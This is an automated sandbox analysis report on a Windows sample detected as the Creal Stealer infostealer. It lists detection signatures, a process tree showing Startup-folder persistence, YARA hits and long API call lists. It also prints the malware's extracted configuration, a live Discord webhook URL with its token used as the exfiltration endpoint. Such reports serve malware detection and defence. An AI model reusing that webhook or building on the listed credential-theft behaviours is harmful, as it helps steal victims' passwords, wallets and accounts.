Edit tour

Windows Analysis Report
HyZh4pn0RF.exe

Overview

General Information

Sample name:	HyZh4pn0RF.exe renamed because original name is a hash value
Original sample name:	52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c.exe
Analysis ID:	1520701
MD5:	a4fd5040db03f0c04306ab7824320269
SHA1:	32a4e4f1c7d0c0fe1be81bddecafeb2303a8227b
SHA256:	52c7c34bcc42c907a275f706cde7c03eab24287f3aec081f0bd88780de131e7c
Tags:	exeuser-JaffaCakes118
Infos:

Detection

Creal Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Creal Stealer

AI detected suspicious sample

Drops PE files to the startup folder

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal communication platform credentials (via file / registry access)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

HyZh4pn0RF.exe (PID: 344 cmdline: "C:\Users\user\Desktop\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)

HyZh4pn0RF.exe (PID: 4040 cmdline: "C:\Users\user\Desktop\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)

cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3032 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

HyZh4pn0RF.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)

HyZh4pn0RF.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe" MD5: A4FD5040DB03F0C04306AB7824320269)

cmd.exe (PID: 4824 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4528 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cleanup

Malware Configuration

Threatname: Creal Stealer

{"C2 url": "https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0Rz"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1826596041.000002539B9A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000A.00000002.2012652158.000001F3E3C00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000A.00000003.1959532011.000001F3E36D7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000A.00000003.1958967533.000001F3E36A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000002.00000003.1783432003.000002539B1E5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000A.00000003.1958731140.000001F3E3403000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000002.00000003.1783767443.000002539B464000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000A.00000003.1959293524.000001F3E36B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000A.00000003.1958528378.000001F3E363E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000002.00000003.1783368757.000002539B404000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
Process Memory Space: HyZh4pn0RF.exe PID: 4040	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
Click to see the 6 entries

Sigma Signatures

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\HyZh4pn0RF.exe, ProcessId: 4040, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HyZh4pn0RF.exe

Avira: detected

Found malware configuration

Source: HyZh4pn0RF.exe.4040.2.memstrmin

Malware Configuration Extractor: Creal Stealer {"C2 url": "https://discord.com/api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0Rz"}

Multi AV Scanner detection for submitted file

Source: HyZh4pn0RF.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: HyZh4pn0RF.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: geolocation-db.com

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB72CB40 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,	2_2_00007FFBAB72CB40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB758A90 CRYPTO_malloc,ERR_new,ERR_set_debug,	2_2_00007FFBAB758A90
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB758810 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,	2_2_00007FFBAB758810
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB744C28 EVP_MAC_CTX_free,CRYPTO_free,	2_2_00007FFBAB744C28
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB766C40 CRYPTO_realloc,	2_2_00007FFBAB766C40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7111A9 EVP_MAC_CTX_free,CRYPTO_free,	2_2_00007FFBAB7111A9
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB712464 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	2_2_00007FFBAB712464
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711F87 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,	2_2_00007FFBAB711F87
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB714BD0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,	2_2_00007FFBAB714BD0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB72EC00 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,	2_2_00007FFBAB72EC00
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB752C10 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	2_2_00007FFBAB752C10
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB71213F EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,	2_2_00007FFBAB71213F
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB73EB40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,	2_2_00007FFBAB73EB40
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB71110E EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,	2_2_00007FFBAB71110E
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB714B10 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,	2_2_00007FFBAB714B10
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711A32 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,	2_2_00007FFBAB711A32
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7120E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	2_2_00007FFBAB7120E0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB71117C _time64,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,	2_2_00007FFBAB71117C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB712365 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,	2_2_00007FFBAB712365
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7117F8 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	2_2_00007FFBAB7117F8
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB77A930 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,	2_2_00007FFBAB77A930
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB72E948 CRYPTO_free,	2_2_00007FFBAB72E948
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711811 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	2_2_00007FFBAB711811
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB724980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,	2_2_00007FFBAB724980
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB726990 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,	2_2_00007FFBAB726990
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7113DE EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_security_bits,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_bn_param,EVP_PKEY_get_bn_param,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,ERR_set_debug,EVP_DigestSign,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	2_2_00007FFBAB7113DE
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711181 CRYPTO_free,CRYPTO_free,CRYPTO_free,	2_2_00007FFBAB711181
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	2_2_00007FFBAB711A41
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,	2_2_00007FFBAB711A05
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB711B90 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,	2_2_00007FFBAB711B90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB776244 CRYPTO_memcmp,	10_2_00007FFBBB776244
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7718E0 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,PyObject_GetBuffer,PyBuffer_IsContiguous,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyExc_ValueError,PyExc_ValueError,PyErr_Format,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_OverflowError,PyExc_OverflowError,_Py_Dealloc,PyExc_ValueError,	10_2_00007FFBBB7718E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB83CB40 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,	10_2_00007FFBBB83CB40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB868810 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,	10_2_00007FFBBB868810
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821361 CRYPTO_malloc,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,ERR_pop_to_mark,CRYPTO_free,EVP_PKEY_free,	10_2_00007FFBBB821361
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB825C53 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,	10_2_00007FFBBB825C53
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82222A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,	10_2_00007FFBBB82222A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8223E7 CRYPTO_free,CRYPTO_memdup,	10_2_00007FFBBB8223E7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82267B CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,	10_2_00007FFBBB82267B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,	10_2_00007FFBBB82150F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,	10_2_00007FFBBB821CEE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB833B30 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,	10_2_00007FFBBB833B30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB88BB70 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,	10_2_00007FFBBB88BB70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB86DB60 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	10_2_00007FFBBB86DB60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	10_2_00007FFBBB821C53
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8213D9 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,	10_2_00007FFBBB8213D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8223EC CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,	10_2_00007FFBBB8223EC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB86DAF0 CRYPTO_free,	10_2_00007FFBBB86DAF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB845AE0 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,	10_2_00007FFBBB845AE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB885B10 EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,	10_2_00007FFBBB885B10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB835B10 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,	10_2_00007FFBBB835B10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82271B CRYPTO_free,CRYPTO_strdup,	10_2_00007FFBBB82271B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB846758 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,ERR_peek_error,	10_2_00007FFBBB846758
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB877A40 CRYPTO_free,CRYPTO_free,CRYPTO_free,	10_2_00007FFBBB877A40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB846758 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,ERR_peek_error,	10_2_00007FFBBB846758
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82204A CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,	10_2_00007FFBBB82204A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8459F0 CRYPTO_free,CRYPTO_free,	10_2_00007FFBBB8459F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB835A10 OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,	10_2_00007FFBBB835A10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821A16 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,	10_2_00007FFBBB821A16
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821D84 CRYPTO_free,CRYPTO_memdup,	10_2_00007FFBBB821D84
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB82107D CRYPTO_free,	10_2_00007FFBBB82107D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB837980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,strncmp,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_free,	10_2_00007FFBBB837980
